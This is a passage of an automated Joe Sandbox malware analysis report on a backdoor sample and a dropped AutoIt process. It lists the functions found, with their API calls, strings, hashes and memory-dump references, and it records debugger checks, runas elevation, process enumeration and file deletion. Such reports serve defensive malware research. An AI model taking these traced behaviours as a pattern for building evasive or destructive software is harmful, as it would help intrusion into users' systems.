Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseQueryValue
String ID: open cmd
API String ID: 3356406503-2392162428
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: 998e79ef7726f2f5777b90a8cc8b3066c283ada07cb0ab9722e08f3c700fe3cb
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: D1017C72500209AEDF219F51CC09EDB3BB9EB54364F11803AFD1AA2191D738D968DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403B34 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,771B3420,00000000,C:\Users\user~1\AppData\Local\Temp\,00403B0C,00403A3B,?), ref: 00403B4E
GlobalFree.KERNEL32(00000000), ref: 00403B55

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403B34

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 1100898210-2382934351
Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
Instruction ID: 695255c2ecde24bf448a41ac97d2e3a141eb08f66f7233a7170c0cf0b0d44fd9
Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
Instruction Fuzzy Hash: A0E0123390112057C6215F55FE04B5AB77D6F45B26F05403BE980BB2618B786C428BDC

Uniqueness

Uniqueness Score: -1.00%

Function 00405E35 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 00405E3B
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,80000000,00000003), ref: 00405E4B

Strings

C:\Users\user\Desktop, xrefs: 00405E35

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3976562730
Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction ID: cbb238d5cba983021c059698dd1e30487a08ad5c01a1b7d12c600bff718c79a2
Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction Fuzzy Hash: 0ED05EB2410A209AC3126708EC04A9F63ACEF5570074A4427E581A61A4E7785E818AE8

Uniqueness

Uniqueness Score: -1.00%

Function 00405F6F Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F7F
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F97
CharNextA.USER32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA8
lstrlenA.KERNEL32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB1

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: d1bddae3a0f18f97ac1aa465d67762edc6f3aabfb23b395e61e0e19fb30ac715
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 50F0C231205414FFD7029FA5DE049AFBBA8EF06250B2140BAE840F7310DA78DE019BA8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Telecom.pifPID: 6936, Parent PID: 6580COMMON

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	47

Executed Functions

Function 00445FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00445FF7

Part of subcall function 00448577: _wcslen.LIBCMT ref: 0044858A

GetCurrentProcess.KERNEL32(?,004DDC2C,00000000,?,?), ref: 00446123
IsWow64Process.KERNEL32(00000000,?,?), ref: 0044612A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00446155
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00446167
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00446175
FreeLibrary.KERNEL32(00000000,?,?), ref: 0044617C
GetSystemInfo.KERNEL32(?,?,?), ref: 004461A1

Strings

GetNativeSystemInfo, xrefs: 00446161
|O, xrefs: 004850F7
kernel32.dll, xrefs: 00446150

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 650fadbce65ae0de30aa456732fe847067561234d4121f5194a4953d47e13c21
Instruction ID: b85aec31d2807949d65ff8512a5dc1c0563e12e753069cf9870c0a5cea187d58
Opcode Fuzzy Hash: 650fadbce65ae0de30aa456732fe847067561234d4121f5194a4953d47e13c21
Instruction Fuzzy Hash: 66A18F2680A2C4CFD716DB687C451D97FA46B37300F28CC9BD4A497222C62D456DEB3A

Uniqueness

Uniqueness Score: -1.00%

Function 0044338B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00443368,?), ref: 004433BB
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00443368,?), ref: 004433CE
GetFullPathNameW.KERNEL32(00007FFF,?,?,00512418,00512400,?,?,?,?,?,?,00443368,?), ref: 0044343A

Part of subcall function 00448577: _wcslen.LIBCMT ref: 0044858A

Part of subcall function 0044425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00443462,00512418,?,?,?,?,?,?,?,00443368,?), ref: 004442A0

SetCurrentDirectoryW.KERNEL32(?,00000001,00512418,?,?,?,?,?,?,?,00443368,?), ref: 004434BB
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00483CB0
SetCurrentDirectoryW.KERNEL32(?,00512418,?,?,?,?,?,?,?,00443368,?), ref: 00483CF1
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,005031F4,00512418,?,?,?,?,?,?,?,00443368), ref: 00483D7A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00483D81

Part of subcall function 004434D3: GetSysColorBrush.USER32(0000000F), ref: 004434DE
Part of subcall function 004434D3: LoadCursorW.USER32(00000000,00007F00), ref: 004434ED
Part of subcall function 004434D3: LoadIconW.USER32(00000063), ref: 00443503
Part of subcall function 004434D3: LoadIconW.USER32(000000A4), ref: 00443515
Part of subcall function 004434D3: LoadIconW.USER32(000000A2), ref: 00443527
Part of subcall function 004434D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0044353F
Part of subcall function 004434D3: RegisterClassExW.USER32(?), ref: 00443590

Part of subcall function 004435B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004435E1
Part of subcall function 004435B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00443602
Part of subcall function 004435B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00443368,?), ref: 00443616
Part of subcall function 004435B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00443368,?), ref: 0044361F

Part of subcall function 0044396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00443A3C

Strings

0$Q, xrefs: 00443495
AutoIt, xrefs: 00483CA5
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00483CAA
runas, xrefs: 00483D75

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: 0$Q$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-2616915822
Opcode ID: c644739c6ff8c20eeaf8f1d6cd79d6e324e0d1a4f731e5e2bd752c7af8fb0851
Instruction ID: d04014d526585b994edaf438d56b542ea76a1f68129a70cabd6e42594293b5a8
Opcode Fuzzy Hash: c644739c6ff8c20eeaf8f1d6cd79d6e324e0d1a4f731e5e2bd752c7af8fb0851
Instruction Fuzzy Hash: 15512570108340AAFB01FF619C11DEE7FA8AF95B09F00082FF491521A2CB6C9A5DD76B

Uniqueness

Uniqueness Score: -1.00%

Function 004AD921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00445851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004455D1,?,?,00484B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00445871

Part of subcall function 004AEAB0: GetFileAttributesW.KERNEL32(?,004AD840), ref: 004AEAB1

FindFirstFileW.KERNEL32(?,?), ref: 004AD9CD
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 004ADA88
MoveFileW.KERNEL32(?,?), ref: 004ADA9B
DeleteFileW.KERNEL32(?,?,?,?), ref: 004ADAB8
FindNextFileW.KERNELBASE(00000000,00000010), ref: 004ADAE2

Part of subcall function 004ADB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,004ADAC7,?,?), ref: 004ADB5D

FindClose.KERNEL32(00000000,?,?,?), ref: 004ADAFE
FindClose.KERNEL32(00000000), ref: 004ADB0F

Strings

\*.*, xrefs: 004AD978, 004AD981, 004AD996

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 9b881a27d824f46e858c3e2972ae9761f3164ec4d52d5df1999622ef4994afc7
Instruction ID: 9137cbd3817686c794384435e65a7089822a4ba1c39e31a2414d5c964fb91e64
Opcode Fuzzy Hash: 9b881a27d824f46e858c3e2972ae9761f3164ec4d52d5df1999622ef4994afc7
Instruction Fuzzy Hash: 96614171C0110DAEDF05EBA1D9529EEB775EF25304F2040AAE40677191DB39AF09CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004ADC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00445851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004455D1,?,?,00484B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00445871

Part of subcall function 004AEAB0: GetFileAttributesW.KERNEL32(?,004AD840), ref: 004AEAB1

FindFirstFileW.KERNEL32(?,?), ref: 004ADCCB
DeleteFileW.KERNEL32(?,?,?,?), ref: 004ADD1B
FindNextFileW.KERNEL32(00000000,00000010), ref: 004ADD2C
FindClose.KERNEL32(00000000), ref: 004ADD43
FindClose.KERNEL32(00000000), ref: 004ADD4C

Strings

\*.*, xrefs: 004ADC9D

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: fa510bf34ff012415f589d56c62a076f101a54dd0960699662fdd38453611304
Instruction ID: cb1f4f8df178f7a7cc6f39b67ea2685dcb42b18f2c246de703c65dc2e76d1620
Opcode Fuzzy Hash: fa510bf34ff012415f589d56c62a076f101a54dd0960699662fdd38453611304
Instruction Fuzzy Hash: 9A3182714093459BD301EF60C8858AFB7E8BEA6304F404D6FF4D682191EB28DA09CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 004ADD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 004ADDAC
Process32FirstW.KERNEL32(00000000,?), ref: 004ADDBA
Process32NextW.KERNEL32(00000000,?), ref: 004ADDDA
FindCloseChangeNotification.KERNEL32(00000000), ref: 004ADE87

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: cd6cfdfa6dca73a990eb47be73b4fd742b2e9c3ca8d0fd3123f46d702b4657b8
Instruction ID: a4eebda263b7245bcb07a4ed22e6381fca6684701b5eb4047d21aeb9a75a83a5
Opcode Fuzzy Hash: cd6cfdfa6dca73a990eb47be73b4fd742b2e9c3ca8d0fd3123f46d702b4657b8
Instruction Fuzzy Hash: 0031A2724083019FD304EF61CC85AAFBBE8EFA9344F04092EF586871A1DB75D949CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004AE472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,004846AC), ref: 004AE482
GetFileAttributesW.KERNEL32(?), ref: 004AE491
FindFirstFileW.KERNEL32(?,?), ref: 004AE4A2
FindClose.KERNEL32(00000000), ref: 004AE4AE

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 1f8aa09dc265769bc6e8e39cd4d0ad68d02c2e0ac074b38c000e97beb6cf873a
Instruction ID: df0c6841eccea40726aa200ae6a1562b3a370eff7c10063a73c27b00cd11e42b
Opcode Fuzzy Hash: 1f8aa09dc265769bc6e8e39cd4d0ad68d02c2e0ac074b38c000e97beb6cf873a
Instruction Fuzzy Hash: 51F0A030811A205792106738AC0D8AB776DAE27335B504753F876C21E0D7789995869E

Uniqueness

Uniqueness Score: -1.00%

Function 0045AC3E Relevance: 37.4, APIs: 1, Strings: 20, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`M, xrefs: 0045ADE2
4M, xrefs: 0045AD45
d1b, xrefs: 0045AD55, 0045AE8E
(Q, xrefs: 0045AD4D
`*Q, xrefs: 0045AFF9
(Q, xrefs: 0045AD65
PM, xrefs: 0045AD3D
d10m0, xrefs: 0045ACF0
tM, xrefs: 0045ADCC
(Q, xrefs: 0045ADC1
@M, xrefs: 0045ADED
i, xrefs: 0045B0A3
d5m0, xrefs: 0045AE75
M, xrefs: 0045AD74
d1r0,2, xrefs: 0045ACA9
tM, xrefs: 0045AD35
e#Q, xrefs: 0045AFA9
M, xrefs: 0045AD8A
(Q, xrefs: 0045ADD7
d0b, xrefs: 0045AC96, 0045AD10, 0045AEA7

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID: 4M$@M$PM$`*Q$`M$d0b$d10m0$d1b$d1r0,2$d5m0$e#Q$i$tM$tM$(Q$(Q$(Q$(Q$M$M
API String ID: 0-1508705815
Opcode ID: 9f599c3fb501a1a6ad8beb09ee0a2117303080742560fa6310a057b1a6cb56cd
Instruction ID: 7ac7e6557d74d8d1ff3db39b252b295987b7b0838c0d45ded847e7bd7eb3968d
Opcode Fuzzy Hash: 9f599c3fb501a1a6ad8beb09ee0a2117303080742560fa6310a057b1a6cb56cd
Instruction Fuzzy Hash: E2624C705083419FC724DF19C494A9ABBE1FF89308F14896FE4898B352DB79D949CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 00443EAB Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

', xrefs: 004845F3
Unterminated group of comments, xrefs: 00484716
#pragma compile, xrefs: 00443F06
Cannot parse #include, xrefs: 00484703
#OnAutoItStartRegister, xrefs: 00443F4A
#include, xrefs: 00443F7A
", xrefs: 004845DD
#ce, xrefs: 00444020
#comments-end, xrefs: 0044400C
#cs, xrefs: 00443FA6, 00443FF8
#notrayicon, xrefs: 00443F1A
#requireadmin, xrefs: 00443F32
Bad directive syntax error, xrefs: 00484624
#comments-start, xrefs: 00443F92, 00443FE4
#include-once, xrefs: 00443F62

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: acdde903d91805d484003065fb7d08878d6f33474d75111943afb62606f5234a
Instruction ID: a2af362615b08f3b7a5e420c007c5b7ff67df9723520888aee41df0d5fc6c5ab
Opcode Fuzzy Hash: acdde903d91805d484003065fb7d08878d6f33474d75111943afb62606f5234a
Instruction Fuzzy Hash: 0F81E471A40206BBEB10AF61CC42FAF7769AF16744F14401BF905AA281EB7DDE01C79E

Uniqueness

Uniqueness Score: -1.00%

Function 00443624 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00443657
RegisterClassExW.USER32(00000030), ref: 00443681
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00443692
InitCommonControlsEx.COMCTL32(?), ref: 004436AF
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004436BF
LoadIconW.USER32(000000A9), ref: 004436D5
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004436E4

Strings

AutoIt v3 GUI, xrefs: 00443673
TaskbarCreated, xrefs: 00443687
+, xrefs: 00443640
0, xrefs: 00443639
0+m"D, xrefs: 0044366C

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
